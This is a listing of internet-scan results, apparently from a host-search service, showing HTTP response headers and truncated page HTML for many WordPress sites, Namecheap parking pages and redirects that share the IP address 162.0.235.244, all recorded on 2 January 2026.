  • Open service 162.0.235.244:443 · www.lahorwaters.com

    2026-01-02 22:12

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://lahorwaters.com/
    x-litespeed-cache: hit
    content-length: 0
    date: Fri, 02 Jan 2026 22:12:10 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.store.goyam.online

    2026-01-02 22:02

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://store.goyam.online/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 02 Jan 2026 22:02:35 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · lahorwaters.com

    2026-01-02 21:37

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://lahorwaters.com/wp-json/>; rel="https://api.w.org/"
    link: <https://lahorwaters.com/wp-json/wp/v2/pages/21574>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://lahorwaters.com/>; rel=shortlink
    etag: "749-1767181117;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 21:37:50 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · mirental.ca

    2026-01-02 21:37

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://mirental.ca/wp-json/>; rel="https://api.w.org/"
    link: <https://mirental.ca/wp-json/wp/v2/pages/95>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://mirental.ca/>; rel=shortlink
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: 802_front,802_URL.6666cd76f96956469e7be39d750cc7d9,802_F,802_Po.95,802_PGS,802_
    etag: "413-1767389830;;;"
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 21:37:10 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · platonika.study

    2026-01-02 21:03

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    cache-control: public
    expires: Fri, 02 Jan 2026 21:03:03 GMT
    content-type: text/html
    accept-ranges: bytes
    content-length: 326350
    date: Fri, 02 Jan 2026 21:03:03 GMT
    server: LiteSpeed
    x-speedycache-source: Server
    cache-tag: platonika.study
    cdn-cache-control: max-age=1296000
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Home - Platonika Learning
    
    <!DOCTYPE html>
    <html lang="en-CA">
    <head>
    <meta charset="UTF-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="pingback" href="https://platonika.study/xmlrpc.php"/>
    <title>Home - Platonika Learning</title><link rel="preload" as="image" href="http://platonika.study/wp-content/uploads/2024/09/logo-original.png" />
    <meta name='robots' content='index, max-snippet:-1, max-image-preview:large, max-video-preview:-1, follow'/>
    <link rel="alternate" href="https://platonika.study/" hreflang="en"/>
    <link rel="alternate" href="https://platonika.study/uk/" hreflang="uk"/>
    <link rel="alternate" href="https://platonika.study/ru/" hreflang="ru"/>
    <link rel="canonical" href="https://platonika.study/"/>
    <meta name="description" content=""><script type="application/ld+json">{"@context":"https://schema.org","@type":"Organization","@id":"https://platonika.study/#","name":"","url":"https://platonika.study","logo":{"@type":"ImageObject","@id":"https://platonika.study/#logo","inLanguage":"en-CA"},"description":"Platonika Learning","sameAs":["https://x.com/"]}</script><meta property="og:url" content="https://platonika.study/"/><meta property="og:site_name" content="Platonika Learning"/><meta property="og:locale" content="en_CA"/><meta property="og:type" content="website"/><meta property="og:title" content="Home - Platonika Learning"/><meta name="twitter:card" content="summary"/><meta name="twitter:locale" content="en_CA"/><meta name="twitter:title" content="Home - Platonika Learning"/><meta name="twitter:url" content="https://platonika.study/"/><link rel='dns-prefetch' href='//fonts.googleapis.com'/>
    <link rel="alternate" type="application/rss+xml" title="Platonika Learning &raquo; Feed" href="https://platonika.study/feed/"/>
    <link rel="alternate" type="application/rss+xml" title="Platonika Learning &raquo; Comments Feed" href="https://platonika.study/comments/feed/"/>
    <meta content="Divi v.4.27.4" name="generator"/><link rel="stylesheet" href="https://platonika.study/wp-content/cache/speedycache/platonika.study/assets/d32c85ed80eeadc0-d32c85ed80eeadc0-combined.css" />
    <style id='wp-block-library-theme-inline-css' type='text/css'>.wp-block-audio :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio :where(figcaption){color:#ffffffa6}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}:root :where(.wp-block-image figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme :root :where(.wp-block-image figcaption){color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote:where(.has-text-align-right){border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote:where(.has-text-align-center){border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote:where(.is-style-plain){border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-se
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.hmq.devdecimosite2025.com

    2026-01-02 20:43

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://hmq.devdecimosite2025.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 02 Jan 2026 20:43:23 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · telefonoip.cl

    2026-01-02 19:57

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://www.telefonoip.cl/
    content-length: 0
    date: Fri, 02 Jan 2026 19:57:32 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · chatdesk.cl

    2026-01-02 19:52

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    x-dns-prefetch-control: on
    content-type: text/html; charset=UTF-8
    link: <https://chatdesk.cl/wp-json/>; rel="https://api.w.org/"
    link: <https://chatdesk.cl/wp-json/wp/v2/pages/1805>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://chatdesk.cl/>; rel=shortlink
    etag: "977-1767372406;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 19:52:30 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · westeestores.com

    2026-01-02 19:45

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 5061
    date: Fri, 02 Jan 2026 19:45:35 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Namecheap Parking Page
    
    <!DOCTYPE html>
    
    <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta name="description" content="">
      <meta name="keywords" content="">
      <meta name="author" content="">
      <title>Namecheap Parking Page</title>
      <link rel="stylesheet" href="/nc_assets/css/style.css">
      <link rel="shortcut icon" href="/nc_assets/img/nc-icon/favicon.ico">
      <link rel="apple-touch-icon" sizes="152x152" href="/nc_assets/img/nc-icon/namecheap-icon-152x152.png">
      <link rel="apple-touch-icon" sizes="144x144" href="/nc_assets/img/nc-icon/namecheap-icon-144x144.png">
      <link rel="apple-touch-icon" sizes="120x120" href="/nc_assets/img/nc-icon/namecheap-icon-120x120.png">
      <link rel="apple-touch-icon" sizes="114x114" href="/nc_assets/img/nc-icon/namecheap-icon-114x114.png">
      <link rel="apple-touch-icon" sizes="76x76" href="/nc_assets/img/nc-icon/namecheap-icon-76x76.png">
      <link rel="apple-touch-icon" sizes="72x72" href="/nc_assets/img/nc-icon/namecheap-icon-72x72.png">
      <link rel="apple-touch-icon-precomposed" href="/nc_assets/img/nc-icon/namecheap-icon-57x57.png">
    </head>
    
    <body>
      <div class="wrapper">
        <header class="header">
          <div class="logo">  
            <div>hosted by</div>
            <a href="https://www.namecheap.com/"><img src="/nc_assets/img/logos/namecheap-hd.png" alt="Namecheap"></a>
          </div>
        </header>
        <div class="grid-row flex first four-fifths reset-mb">
          <div class="main fix-left margin-bottom">
            <div class="headline">
                <h1>Your website is ready to go!</h1>
            </div>
            <p class="help-block"><span class="nc-icon icon-checkmark" aria-hidden="true"></span> Hosting account was successfully created on the server</p>
            <p class="help-block"><span class="nc-icon icon-checkmark" aria-hidden="true"></span> Nameservers have been set up properly</p>
            <p class="help-block"><span class="nc-icon icon-checkmark" aria-hidden="true"></span> DNS propagation is completed</p>
          </div>
          <div class="aside">
            <picture>
              <img src="/nc_assets/img/featured/600/ready-to-go.png" alt="Namecheap Parking Page">
            </picture>
          </div>
        </div>
        <div class="grid-row flex four-fifths reset-mt">
          <div class="main-all">
            <h4 class="margin-bottom">Please find some useful links below</h4>
          </div>
          <div class="main fix-left">
            <p class="help-block grey">
              <a href="javascript:void(0);"
                 data-href="https://www.namecheap.com/support/knowledgebase/subcategory.aspx/27/getting-started"
                 onclick="window.open(this.getAttribute('data-href'));return false;"
                 rel="noindex,nofollow">
                <span class="nc-icon icon-start" aria-hidden="true"></span>
                Getting started →
              </a>
            </p>
            <p class="help-block grey"><a href="http://westeestores.com/cpanel" target="_blank"><span class="nc-icon icon-cpanel" aria-hidden="true"></span> cPanel login →</a></p>
          </div>
          <div class="main fix-left">
            <p class="help-block grey"><a href="http://westeestores.com/webmail" target="_blank"><span class="nc-icon icon-mail" aria-hidden="true"></span> WebMail login →</a></p>
            <p class="help-block grey">
              <a href="javascript:void(0);"
                 data-href="https://www.namecheap.com/support/"
                 onclick="window.open(this.getAttribute('data-href'));return false;"
                 rel="noindex,nofollow">
                <span class="nc-icon icon-support" aria-hidden="true"></span>
                Support System →
              </a>
            </p>
          </div>
          <div class="main fix-left">
            <p class="help-block grey">
              <a href="javascript:void(0);"
                 data-href="https://www.namecheap.com/status-updates/"
                 onclick="window.open(this.getAttribute('data-href'));return false;"
                 rel="noindex,nofollow">
                <span class="nc-icon icon-news" aria-hidden="true"></span>
                News →
              </a>
            </p>
            <p class="help-block grey reset-m
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · westeestores.com

    2026-01-02 19:45

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 5061
    date: Fri, 02 Jan 2026 19:45:35 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Namecheap Parking Page
    
    <!DOCTYPE html>
    
    <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta name="description" content="">
      <meta name="keywords" content="">
      <meta name="author" content="">
      <title>Namecheap Parking Page</title>
      <link rel="stylesheet" href="/nc_assets/css/style.css">
      <link rel="shortcut icon" href="/nc_assets/img/nc-icon/favicon.ico">
      <link rel="apple-touch-icon" sizes="152x152" href="/nc_assets/img/nc-icon/namecheap-icon-152x152.png">
      <link rel="apple-touch-icon" sizes="144x144" href="/nc_assets/img/nc-icon/namecheap-icon-144x144.png">
      <link rel="apple-touch-icon" sizes="120x120" href="/nc_assets/img/nc-icon/namecheap-icon-120x120.png">
      <link rel="apple-touch-icon" sizes="114x114" href="/nc_assets/img/nc-icon/namecheap-icon-114x114.png">
      <link rel="apple-touch-icon" sizes="76x76" href="/nc_assets/img/nc-icon/namecheap-icon-76x76.png">
      <link rel="apple-touch-icon" sizes="72x72" href="/nc_assets/img/nc-icon/namecheap-icon-72x72.png">
      <link rel="apple-touch-icon-precomposed" href="/nc_assets/img/nc-icon/namecheap-icon-57x57.png">
    </head>
    
    <body>
      <div class="wrapper">
        <header class="header">
          <div class="logo">  
            <div>hosted by</div>
            <a href="https://www.namecheap.com/"><img src="/nc_assets/img/logos/namecheap-hd.png" alt="Namecheap"></a>
          </div>
        </header>
        <div class="grid-row flex first four-fifths reset-mb">
          <div class="main fix-left margin-bottom">
            <div class="headline">
                <h1>Your website is ready to go!</h1>
            </div>
            <p class="help-block"><span class="nc-icon icon-checkmark" aria-hidden="true"></span> Hosting account was successfully created on the server</p>
            <p class="help-block"><span class="nc-icon icon-checkmark" aria-hidden="true"></span> Nameservers have been set up properly</p>
            <p class="help-block"><span class="nc-icon icon-checkmark" aria-hidden="true"></span> DNS propagation is completed</p>
          </div>
          <div class="aside">
            <picture>
              <img src="/nc_assets/img/featured/600/ready-to-go.png" alt="Namecheap Parking Page">
            </picture>
          </div>
        </div>
        <div class="grid-row flex four-fifths reset-mt">
          <div class="main-all">
            <h4 class="margin-bottom">Please find some useful links below</h4>
          </div>
          <div class="main fix-left">
            <p class="help-block grey">
              <a href="javascript:void(0);"
                 data-href="https://www.namecheap.com/support/knowledgebase/subcategory.aspx/27/getting-started"
                 onclick="window.open(this.getAttribute('data-href'));return false;"
                 rel="noindex,nofollow">
                <span class="nc-icon icon-start" aria-hidden="true"></span>
                Getting started →
              </a>
            </p>
            <p class="help-block grey"><a href="http://westeestores.com/cpanel" target="_blank"><span class="nc-icon icon-cpanel" aria-hidden="true"></span> cPanel login →</a></p>
          </div>
          <div class="main fix-left">
            <p class="help-block grey"><a href="http://westeestores.com/webmail" target="_blank"><span class="nc-icon icon-mail" aria-hidden="true"></span> WebMail login →</a></p>
            <p class="help-block grey">
              <a href="javascript:void(0);"
                 data-href="https://www.namecheap.com/support/"
                 onclick="window.open(this.getAttribute('data-href'));return false;"
                 rel="noindex,nofollow">
                <span class="nc-icon icon-support" aria-hidden="true"></span>
                Support System →
              </a>
            </p>
          </div>
          <div class="main fix-left">
            <p class="help-block grey">
              <a href="javascript:void(0);"
                 data-href="https://www.namecheap.com/status-updates/"
                 onclick="window.open(this.getAttribute('data-href'));return false;"
                 rel="noindex,nofollow">
                <span class="nc-icon icon-news" aria-hidden="true"></span>
                News →
              </a>
            </p>
            <p class="help-block grey reset-m
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.westeestores.com

    2026-01-02 19:45

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 5073
    date: Fri, 02 Jan 2026 19:45:35 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Namecheap Parking Page
    
    <!DOCTYPE html>
    
    <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta name="description" content="">
      <meta name="keywords" content="">
      <meta name="author" content="">
      <title>Namecheap Parking Page</title>
      <link rel="stylesheet" href="/nc_assets/css/style.css">
      <link rel="shortcut icon" href="/nc_assets/img/nc-icon/favicon.ico">
      <link rel="apple-touch-icon" sizes="152x152" href="/nc_assets/img/nc-icon/namecheap-icon-152x152.png">
      <link rel="apple-touch-icon" sizes="144x144" href="/nc_assets/img/nc-icon/namecheap-icon-144x144.png">
      <link rel="apple-touch-icon" sizes="120x120" href="/nc_assets/img/nc-icon/namecheap-icon-120x120.png">
      <link rel="apple-touch-icon" sizes="114x114" href="/nc_assets/img/nc-icon/namecheap-icon-114x114.png">
      <link rel="apple-touch-icon" sizes="76x76" href="/nc_assets/img/nc-icon/namecheap-icon-76x76.png">
      <link rel="apple-touch-icon" sizes="72x72" href="/nc_assets/img/nc-icon/namecheap-icon-72x72.png">
      <link rel="apple-touch-icon-precomposed" href="/nc_assets/img/nc-icon/namecheap-icon-57x57.png">
    </head>
    
    <body>
      <div class="wrapper">
        <header class="header">
          <div class="logo">  
            <div>hosted by</div>
            <a href="https://www.namecheap.com/"><img src="/nc_assets/img/logos/namecheap-hd.png" alt="Namecheap"></a>
          </div>
        </header>
        <div class="grid-row flex first four-fifths reset-mb">
          <div class="main fix-left margin-bottom">
            <div class="headline">
                <h1>Your website is ready to go!</h1>
            </div>
            <p class="help-block"><span class="nc-icon icon-checkmark" aria-hidden="true"></span> Hosting account was successfully created on the server</p>
            <p class="help-block"><span class="nc-icon icon-checkmark" aria-hidden="true"></span> Nameservers have been set up properly</p>
            <p class="help-block"><span class="nc-icon icon-checkmark" aria-hidden="true"></span> DNS propagation is completed</p>
          </div>
          <div class="aside">
            <picture>
              <img src="/nc_assets/img/featured/600/ready-to-go.png" alt="Namecheap Parking Page">
            </picture>
          </div>
        </div>
        <div class="grid-row flex four-fifths reset-mt">
          <div class="main-all">
            <h4 class="margin-bottom">Please find some useful links below</h4>
          </div>
          <div class="main fix-left">
            <p class="help-block grey">
              <a href="javascript:void(0);"
                 data-href="https://www.namecheap.com/support/knowledgebase/subcategory.aspx/27/getting-started"
                 onclick="window.open(this.getAttribute('data-href'));return false;"
                 rel="noindex,nofollow">
                <span class="nc-icon icon-start" aria-hidden="true"></span>
                Getting started →
              </a>
            </p>
            <p class="help-block grey"><a href="http://www.westeestores.com/cpanel" target="_blank"><span class="nc-icon icon-cpanel" aria-hidden="true"></span> cPanel login →</a></p>
          </div>
          <div class="main fix-left">
            <p class="help-block grey"><a href="http://www.westeestores.com/webmail" target="_blank"><span class="nc-icon icon-mail" aria-hidden="true"></span> WebMail login →</a></p>
            <p class="help-block grey">
              <a href="javascript:void(0);"
                 data-href="https://www.namecheap.com/support/"
                 onclick="window.open(this.getAttribute('data-href'));return false;"
                 rel="noindex,nofollow">
                <span class="nc-icon icon-support" aria-hidden="true"></span>
                Support System →
              </a>
            </p>
          </div>
          <div class="main fix-left">
            <p class="help-block grey">
              <a href="javascript:void(0);"
                 data-href="https://www.namecheap.com/status-updates/"
                 onclick="window.open(this.getAttribute('data-href'));return false;"
                 rel="noindex,nofollow">
                <span class="nc-icon icon-news" aria-hidden="true"></span>
                News →
              </a>
            </p>
            <p class="help-block grey
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.westeestores.com

    2026-01-02 19:45

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 5073
    date: Fri, 02 Jan 2026 19:45:35 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Namecheap Parking Page
    
    <!DOCTYPE html>
    
    <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta name="description" content="">
      <meta name="keywords" content="">
      <meta name="author" content="">
      <title>Namecheap Parking Page</title>
      <link rel="stylesheet" href="/nc_assets/css/style.css">
      <link rel="shortcut icon" href="/nc_assets/img/nc-icon/favicon.ico">
      <link rel="apple-touch-icon" sizes="152x152" href="/nc_assets/img/nc-icon/namecheap-icon-152x152.png">
      <link rel="apple-touch-icon" sizes="144x144" href="/nc_assets/img/nc-icon/namecheap-icon-144x144.png">
      <link rel="apple-touch-icon" sizes="120x120" href="/nc_assets/img/nc-icon/namecheap-icon-120x120.png">
      <link rel="apple-touch-icon" sizes="114x114" href="/nc_assets/img/nc-icon/namecheap-icon-114x114.png">
      <link rel="apple-touch-icon" sizes="76x76" href="/nc_assets/img/nc-icon/namecheap-icon-76x76.png">
      <link rel="apple-touch-icon" sizes="72x72" href="/nc_assets/img/nc-icon/namecheap-icon-72x72.png">
      <link rel="apple-touch-icon-precomposed" href="/nc_assets/img/nc-icon/namecheap-icon-57x57.png">
    </head>
    
    <body>
      <div class="wrapper">
        <header class="header">
          <div class="logo">  
            <div>hosted by</div>
            <a href="https://www.namecheap.com/"><img src="/nc_assets/img/logos/namecheap-hd.png" alt="Namecheap"></a>
          </div>
        </header>
        <div class="grid-row flex first four-fifths reset-mb">
          <div class="main fix-left margin-bottom">
            <div class="headline">
                <h1>Your website is ready to go!</h1>
            </div>
            <p class="help-block"><span class="nc-icon icon-checkmark" aria-hidden="true"></span> Hosting account was successfully created on the server</p>
            <p class="help-block"><span class="nc-icon icon-checkmark" aria-hidden="true"></span> Nameservers have been set up properly</p>
            <p class="help-block"><span class="nc-icon icon-checkmark" aria-hidden="true"></span> DNS propagation is completed</p>
          </div>
          <div class="aside">
            <picture>
              <img src="/nc_assets/img/featured/600/ready-to-go.png" alt="Namecheap Parking Page">
            </picture>
          </div>
        </div>
        <div class="grid-row flex four-fifths reset-mt">
          <div class="main-all">
            <h4 class="margin-bottom">Please find some useful links below</h4>
          </div>
          <div class="main fix-left">
            <p class="help-block grey">
              <a href="javascript:void(0);"
                 data-href="https://www.namecheap.com/support/knowledgebase/subcategory.aspx/27/getting-started"
                 onclick="window.open(this.getAttribute('data-href'));return false;"
                 rel="noindex,nofollow">
                <span class="nc-icon icon-start" aria-hidden="true"></span>
                Getting started →
              </a>
            </p>
            <p class="help-block grey"><a href="http://www.westeestores.com/cpanel" target="_blank"><span class="nc-icon icon-cpanel" aria-hidden="true"></span> cPanel login →</a></p>
          </div>
          <div class="main fix-left">
            <p class="help-block grey"><a href="http://www.westeestores.com/webmail" target="_blank"><span class="nc-icon icon-mail" aria-hidden="true"></span> WebMail login →</a></p>
            <p class="help-block grey">
              <a href="javascript:void(0);"
                 data-href="https://www.namecheap.com/support/"
                 onclick="window.open(this.getAttribute('data-href'));return false;"
                 rel="noindex,nofollow">
                <span class="nc-icon icon-support" aria-hidden="true"></span>
                Support System →
              </a>
            </p>
          </div>
          <div class="main fix-left">
            <p class="help-block grey">
              <a href="javascript:void(0);"
                 data-href="https://www.namecheap.com/status-updates/"
                 onclick="window.open(this.getAttribute('data-href'));return false;"
                 rel="noindex,nofollow">
                <span class="nc-icon icon-news" aria-hidden="true"></span>
                News →
              </a>
            </p>
            <p class="help-block grey
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · metatonix.com

    2026-01-02 19:43

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://metatonix.com/wp-json/>; rel="https://api.w.org/"
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 19:43:35 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · metatonix.com

    2026-01-02 19:43

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://metatonix.com/wp-json/>; rel="https://api.w.org/"
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 19:43:34 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · shunslab.com

    2026-01-02 19:42

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Fri, 02 Jan 2026 19:42:47 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · walchaksurfacecoatings.com

    2026-01-02 19:42

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://walchaksurfacecoatings.com/wp-json/>; rel="https://api.w.org/"
    link: <https://walchaksurfacecoatings.com/wp-json/wp/v2/pages/6220>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://walchaksurfacecoatings.com/>; rel=shortlink
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 19:42:48 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · sourcez.eu

    2026-01-02 19:31

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Fri, 02 Jan 2026 19:31:58 GMT
    server: LiteSpeed
    location: https://sourcez.eu/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.sourcez.eu

    2026-01-02 19:31

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Fri, 02 Jan 2026 19:31:58 GMT
    server: LiteSpeed
    location: https://www.sourcez.eu/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.sourcez.eu

    2026-01-02 19:31

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 5055
    date: Fri, 02 Jan 2026 19:31:58 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Namecheap Parking Page
    
    <!DOCTYPE html>
    
    <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta name="description" content="">
      <meta name="keywords" content="">
      <meta name="author" content="">
      <title>Namecheap Parking Page</title>
      <link rel="stylesheet" href="/nc_assets/css/style.css">
      <link rel="shortcut icon" href="/nc_assets/img/nc-icon/favicon.ico">
      <link rel="apple-touch-icon" sizes="152x152" href="/nc_assets/img/nc-icon/namecheap-icon-152x152.png">
      <link rel="apple-touch-icon" sizes="144x144" href="/nc_assets/img/nc-icon/namecheap-icon-144x144.png">
      <link rel="apple-touch-icon" sizes="120x120" href="/nc_assets/img/nc-icon/namecheap-icon-120x120.png">
      <link rel="apple-touch-icon" sizes="114x114" href="/nc_assets/img/nc-icon/namecheap-icon-114x114.png">
      <link rel="apple-touch-icon" sizes="76x76" href="/nc_assets/img/nc-icon/namecheap-icon-76x76.png">
      <link rel="apple-touch-icon" sizes="72x72" href="/nc_assets/img/nc-icon/namecheap-icon-72x72.png">
      <link rel="apple-touch-icon-precomposed" href="/nc_assets/img/nc-icon/namecheap-icon-57x57.png">
    </head>
    
    <body>
      <div class="wrapper">
        <header class="header">
          <div class="logo">  
            <div>hosted by</div>
            <a href="https://www.namecheap.com/"><img src="/nc_assets/img/logos/namecheap-hd.png" alt="Namecheap"></a>
          </div>
        </header>
        <div class="grid-row flex first four-fifths reset-mb">
          <div class="main fix-left margin-bottom">
            <div class="headline">
                <h1>Your website is ready to go!</h1>
            </div>
            <p class="help-block"><span class="nc-icon icon-checkmark" aria-hidden="true"></span> Hosting account was successfully created on the server</p>
